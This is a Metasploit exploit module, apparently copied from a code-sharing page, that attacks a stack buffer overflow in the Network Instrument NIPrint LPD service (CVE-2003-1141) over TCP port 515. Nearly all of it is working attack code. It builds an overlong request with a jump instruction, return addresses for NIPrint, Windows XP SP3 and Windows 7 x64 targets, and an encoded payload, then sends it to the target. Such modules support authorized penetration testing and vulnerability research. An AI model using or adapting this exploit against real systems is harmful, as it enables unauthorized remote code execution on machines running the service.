Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'NIPrint LPD Request Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in the
16
        Network Instrument NIPrint LPD service. Inspired by
17
        Immunity's VisualSploit :-)
18
      },
19
      'Author'         => [ 'hdm' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          ['CVE', '2003-1141'],
24
          ['OSVDB', '2774'],
25
          ['BID', '8968'],
26
          ['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
27
        ],
28
      'Privileged'     => false,
29
      'Payload'        =>
30
        {
31
          'Space'    => 500,
32
          'BadChars' => "\x00\x0a",
33
          'StackAdjustment' => -3500,
34
        },
35
      'Platform'       => 'win',
36
      'Targets'        =>
37
        [
38
          ['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
39
          ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
40
          ['Windows 7 x64', { 'Ret' => 0x763B35DD }],
41
        ],
42
      'DefaultTarget' => 0,
43
      'DisclosureDate' => '2003-11-05'))
44

45
    register_options(
46
      [
47
        Opt::RPORT(515)
48
      ])
49
  end
50

51
  def exploit
52
    connect
53

54
    req = rand_text_alphanumeric(8192)
55
    req[  0, 2] = "\xeb\x33"
56
    req[ 49, 4] = [target.ret].pack('V')
57
    req[ 53, payload.encoded.length ] = payload.encoded
58

59
    print_status("Trying target #{target.name}...")
60
    sock.put(req)
61

62
    handler
63
    disconnect
64
  end
65
end
66

67